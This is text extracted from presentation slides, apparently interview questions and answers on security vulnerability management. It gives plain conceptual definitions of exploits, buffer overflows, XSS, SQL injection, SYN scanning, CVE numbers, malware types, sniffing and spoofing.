10) How many severity levels (Risk Rating) does a Vulnerability has?

Once a scan report gets generated, Each vulnerability reported will betagged with the severity level ratings of Attention (warning), Low,Medium, and High.

11) On what factors does a Risk rating of Vulnerability depend on?

Risk rating depends on several factors

• If a vulnerability can be exploited with ease

• The impact on the system if it is exploited



44


Q

12) Name few Vulnerability scanners and Securitytools used for manual testing of vulnerabilities.

12) Name few Vulnerability scanners and Security tools used for manualtesting of vulnerabilities


Q

13) What is a False Positive finding (vulnerability) and why does thescanner reports it?

A vulnerability that does not really exist on a device but the scannerreports it as a valid finding. The scanner normally detects thevulnerabilities based on the plug-ins and the banner versions of the applications running on the target machine. Some vendorsincluding Redhat does not update the banners with the updatesand that is how the false positives arise.

14) What is an Exploit and it’s Impact?

An exploit is a piece of software, a chunk of data, or sequence of commands that take advantage of a bug, glitch or vulnerability inorder to cause unintended or unanticipated behavior to occur oncomputer software, hardware, or something electronic (usuallycomputerized). This frequently includes such things as gainingcontrol of a computer system or allowing privilege escalation or adenial of service attack.



45


Q

15) What is buffer overflow and its Types?

A buffer overflow is an anomalous condition where a processattempts to store data beyond the boundaries of a fixed-lengthbuffer. The result is that the extra data overwrites adjacentmemory locations. The overwritten data may include other buffers,variables and program flow data and may cause a process to crashor produce incorrect results. They can be triggered by inputsspecifically designed to execute malicious code or to make theprogram operate in an unintended way. As such, buffer overflowscause many software vulnerabilities and form the basis of manyexploits. Sufficient bounds checking by either the programmer,the compiler or the runtime can prevent buffer overflows. Thereare two different types of buffer overflows that are commonly

used.• Stack based overflow

• Heap based overflow


Q

16) What is cross site scripting?

Cross-site scripting (XSS) is a type of computer security vulnerabilitytypically found in web applications which allow code injection bymalicious web users into the web pages viewed by other users. Examplesof such code include HTML code and client-side scripts. An exploitedcross-site scripting vulnerability can be used by attackers to bypassaccess controls such as the same origin policy. Vulnerabilities of this kindhave been exploited to craft powerful phishing attacks and browserexploits.

17) What is Phishing?

phishing is an attempt to criminally and fraudulently acquire sensitiveinformation, such as usernames, passwords and credit card details, bymasquerading as a trustworthy entity in an electronic communication.eBay, PayPal and online banks are common targets. Phishing is typicallycarried out by email or instant messaging, and often directs users to enterdetails at a website, although phone contact has also been used. Phishingis an example of social engineering techniques used to fool users.Attempts to deal with the growing number of reported phishing incidentsinclude legislation, user training, public awareness, and technicalmeasures.



46


Q

18) What is the Mechanism used for SQL Injection?

SQL injection is a technique used to take advantage of non-validated input vulnerabilities to pass SQL commands through aWeb application for execution by a backend database. Attackerstake advantage of the fact that programmers often chaintogether SQL commands with user-provided parameters, andcan therefore embed SQL commands inside these parameters.The result is that the attacker can execute arbitrary SQL queriesand/or commands on the backend database server through theWeb application.

Databases are fundamental components of Web applications.Databases enable Web applications to store data, preferencesand content elements. Using SQL, Web applications interact withdatabases to dynamically build customized data views for eachuser.


Q

19) Explain the TCP packet flow in a normal TCP connect scan and a StealthScan?

TCP packets have a header section with a flags field. Flags tell the receivingend something about the type of packet, and thus what the correctresponse is. The possible flags are SYN (Synchronise), ACK(Acknowledge), FIN (Finished) and RST (Reset). SYN packets include a TCPsequence number, which lets the remote system know what sequencenumbers to expect in subsequent communication. ACK acknowledgesreceipt of a packet or set of packets, FIN is sent when a communication isfinished, requesting that the connection be closed, and RST is sent whenthe connection is to be reset (closed immediately). To initiate a TCPconnection, the initiating system sends a SYN packet to the destination,which will respond with a SYN of its own, and an ACK, acknowledging thereceipt of the first packet (these are combined into a single SYN/ACKpacket). The first system then sends an ACK packet to acknowledge

receipt of the SYN/ACK, and data transfer can then begin. SYN or Stealthscanning makes use of this procedure by sending a SYN packet andlooking at the response. If SYN/ACK is sent back, the port is open andthe remote end is trying to open a TCP connection. The scanner thensends an RST to tear down the connection before it can be establishedfully; often preventing the connection attempt appearing in applicationlogs.



47


Q

20) What is a CVE number and its purpose?

§ CVE (Common Vulnerabilities and exposures is an onlinedictionary of registered vulnerabilities. This allows forconsistency, as one can refer to a CAN number or CVE numberto avoid ambiguity in discussing vulnerabilities. The CANnumber represents a vulnerability that is a candidate forinclusion into the list, while a CVE number represents avulnerability that has been approved by the CVE EditorialBoard. When a candidate is approved, the number stays thesame but the prefix changes from CAN to CVE.

§ The most common use for a CAN or CVE number is to helpdistinguish between different vulnerabilities, and avoid

addressing the same vulnerability twice under two differentdescriptions. It is best to acquire a CAN number early in itsinvestigation.


Q

21) What are the different Phases involved in conducting aVulnerability Assessment?

vulnerability assessment is carried out in steps and they can varyfrom one organization to the other or may be the naming differs.

• Target selection

• Vulnerability Scanning and Port Scanning

• Vulnerability Assessment and Penetration Testing

• Risk Assessment

• Problem Management

• Vulnerability Review

• Vulnerability Remediation



48


Q

22) What are Viruses and Trojans and their working mechanisms? How doyou detect them?

Viruses: A computer virus is a computer program that can copy itself andinfect a computer without permission or knowledge of the user. Theoriginal virus may modify the copies or the copies may modify themselves.

A virus can only spread from one computer to another when its host is takento the uninfected computer, for instance by a user sending it over anetwork or the Internet, or by carrying it on a removable medium such asa floppy disk, CD, or USB drive. Additionally, viruses can spread to othercomputers by infecting files on a network file system or a file system thatis accessed by another computer.

Worms: A computer worm is a self-replicating computer program. It uses anetwork to send copies of itself to other nodes (computer terminals on the

network) and it may do so without any user intervention. Unlike a virus, itdoes not need to attach itself to an existing program. Worms always harmthe network (if only by consuming bandwidth), whereas viruses alwaysinfect or corrupt files on a targeted computer.


Q

Trojans: a Trojan horse is a program that installs malicious softwarewhile under the guise of doing something else. Though not limitedin their payload, Trojan horses are more notorious for installingbackdoor programs which allow unauthorized non permissibleremote access to the victim's machine by unwanted parties -normally with malicious intentions. Unlike a computer virus, aTrojan horse does not propagate by inserting its code into othercomputer files. The term is derived from the classical myth of theTrojan Horse. Like the mythical Trojan Horse, the malicious code ishidden in a computer program or other computer file which mayappear to be useful, interesting, or at the very least harmless to an

unsuspecting user. When this computer program or file is executedby the unsuspecting user, the malicious code is also executedresulting in the set up or installation of the malicious Trojan horseprogram.



49


Q

23) Define Sniffing and Spoofing.Sniffing: Packet sniffing is a form of wire-tap applied to computer networks

instead of phone networks. It came into vogue with Ethernet, which isknown as a "shared medium" network. This means that traffic on asegment passes by all hosts attached to that segment. Ethernet cards havea filter that prevents the host machine from seeing traffic addressed toother stations. Sniffing programs turn off the filter, and thus seeeveryones traffic. Typical items sniffed include:

SMTP, POP, IMAP traffic

Ÿ Allows intruder to read the actual e-mail.

§ POP, IMAP, HTTP Basic, Telnet authentication

Ÿ Reads passwords off the wire in clear-text.

§ SMB, NFS, FTP traffic

Ÿ Reads files of the wire.§ SQL database

Ÿ Reads financial transactions and credit card numbers.


Q

Spoofing: Spoofing is the creation of TCP/IP packets using somebody else'sIP address. Routers use the "destination IP" address in order to forwardpackets through the Internet, but ignore the "source IP" address. Thataddress is only used by the destination machine when it responds back tothe source. A common misconception is that "IP spoofing" can be used tohide your IP address while surfing the Internet, chatting on-line, sendinge-mail, and so forth. This is generally not true. Forging the source IPaddress causes the responses to be misdirected, meaning you cannotcreate a normal network connection. Examples of spoofing:

§ man-in-the-middle - packet sniffs on link between the two end points,and can therefore pretend to be one end of the connection

§ routing redirect - redirects routing information from the original host tothe hacker's host (this is another form of man-in-the-middle attack).

§source routing - redirects indvidual packets by hackers host

§ blind spoofing - predicts responses from a host, allowing commands tobe sent, but can't get immediate feedback.

§ flooding - SYN flood fills up receive queue from random sourceaddresses; smurf/fraggle spoofs victims address, causing everyongrespond to the victim.




Thank you

Documents

Security Vulnerability Management